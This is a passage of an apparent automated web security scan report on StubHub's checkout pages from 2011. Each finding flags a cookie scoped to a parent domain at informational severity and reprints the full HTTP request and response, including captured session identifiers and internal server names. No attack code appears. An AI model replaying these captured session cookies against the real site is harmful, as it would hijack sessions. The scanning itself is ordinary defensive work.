loaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=B723884239C110395882C35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856496083,"l":"en","i":-1}

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:16 GMT
Server: Apache
Set-Cookie: TLTHID=CDDE81CC39C11039023392EDD8A51875; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
com-stubhub-dye: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 19928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

3.3. https://buy.stubhub.com/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:53 GMT
Server: Apache
Set-Cookie: TLTHID=E3D5265C39C1103900D58A80A84B62C0; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: bc79#182/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null@srwp01byx009.stubprod.com
com-stubhub-dye: bc79#182/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null@srwp01byx009.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://www.stubhub.com/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


3.4. https://buy.stubhub.com/checkout/assets/default.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/assets/default.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/assets/default.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=CD83878639C1103903C3B0044C7300DA; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}

Response

HTTP/1.1 404 Not Found
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Set-Cookie: TLTHID=CEBCC36039C11039A5D3871236610E4F; Path=/; Domain=.stubhub.com
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=1600
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 334

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /checkout/assets/default.css was not found on this se
...[SNIP]...

3.5. https://buy.stubhub.com/checkout/checkout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=D278406039C110390352E52D5035BF67; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:27 GMT
Server: Apache
Set-Cookie: TLTHID=D4150DD639C110390234E07390B95A9D; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c2c7#4f6/checkout/checkout@srwp01byx010.stubprod.com
com-stubhub-dye: c2c7#4f6/checkout/checkout@srwp01byx010.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 20919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

3.6. https://buy.stubhub.com/checkout/checkoutsignin.signin.signinform  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkoutsignin.signin.signinform

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/checkoutsignin.signin.signinform HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:52 GMT
Server: Apache
Set-Cookie: TLTHID=E2F6699439C1103903A6999880D0EEFC; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 17d2#1991/checkout/checkoutsignin.signin.signinform@srwp01byx002.stubprod.com
com-stubhub-dye: 17d2#1991/checkout/checkoutsignin.signin.signinform@srwp01byx002.stubprod.com
Location: https://www.stubhub.com/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


3.7. https://buy.stubhub.com/checkout/resources/mojito/css/common/stubtool.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/resources/mojito/css/common/stubtool.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/resources/mojito/css/common/stubtool.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E0